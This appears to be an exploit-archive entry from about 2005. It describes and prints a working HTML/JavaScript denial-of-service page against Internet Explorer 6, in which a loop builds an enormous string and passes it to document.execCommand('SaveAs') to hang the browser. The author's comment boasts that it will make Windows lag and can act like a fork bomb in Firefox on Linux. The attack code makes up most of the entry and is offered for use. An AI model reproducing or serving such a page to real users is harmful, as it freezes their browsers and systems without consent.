Simple javascript related denial of service that primarily affects Internet Explorer. Version 6.0 was tested and stayed unresponsive for over 3 minutes. Firefox does not appear truly affected as it seems to recover although it may freeze for a short period of time.
142b31ebaf4a6d1c5905efadfe640cc6
<!-- DoS for latest IE -- will make windows lag to hell
Firefox in linux will turn into forkbomb, and Firefox windows will lag for a little while but seems to recover after a few minutes.
Ziplock <sickbeatz@gmail.com>
tested with latest IE with all security patches installed 12/08/2005
-->
<html>
<body>
<script>
var buffer = 'A';
for (var i =0;i<100;i++) {
buffer+=buffer+'A';
}
document.execCommand("SaveAs",buffer);
</script>
</body>
</html>
Comments
No comments yet, be the first!